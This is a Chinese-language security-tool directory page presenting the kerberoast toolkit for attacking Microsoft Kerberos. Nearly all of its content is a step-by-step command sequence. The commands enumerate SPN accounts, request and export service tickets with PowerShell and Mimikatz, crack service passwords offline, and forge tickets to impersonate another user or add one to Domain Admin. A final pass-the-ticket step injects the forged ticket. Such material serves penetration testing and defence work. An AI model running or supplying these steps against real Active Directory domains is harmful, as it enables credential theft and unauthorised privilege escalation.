Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
kerberoast — 用于攻击微软Kerberos实现的工具包:提取SPN账户、请求和导出票据、破解服务密码、重写票据以实现冒充和提权。 | Kitploit
工具/GitHubGitHub/nidem/kerberoast
密码攻击漏洞利用渗透测试身份验证
GitHubnidem/kerberoast

kerberoast

用于攻击微软Kerberos实现的工具包:提取SPN账户、请求和导出票据、破解服务密码、重写票据以实现冒充和提权。

查看仓库
1.5k3123年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

kerberoast

Kerberoast 是一系列用于攻击 MS Kerberos 实现的工具。以下是每个工具功能的简要概述。

使用内置 MS 工具提取用作 SPN 的所有账户

root@kitploit:~
PS C:\> setspn -T medin -Q */*

请求票据

单张票据:

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

所有票据

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

使用 Mimikatz 从内存中提取获取的票据

root@kitploit:~
mimikatz # kerberos::list /export

使用 tgsrepcrack 破解

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

重写

使用户显示为另一个用户

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

将用户添加到另一个组(此处为 Domain Admin)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

使用 Mimikatz 重新注入到内存

root@kitploit:~
kerberos::ptt sql.kirbi
下载工具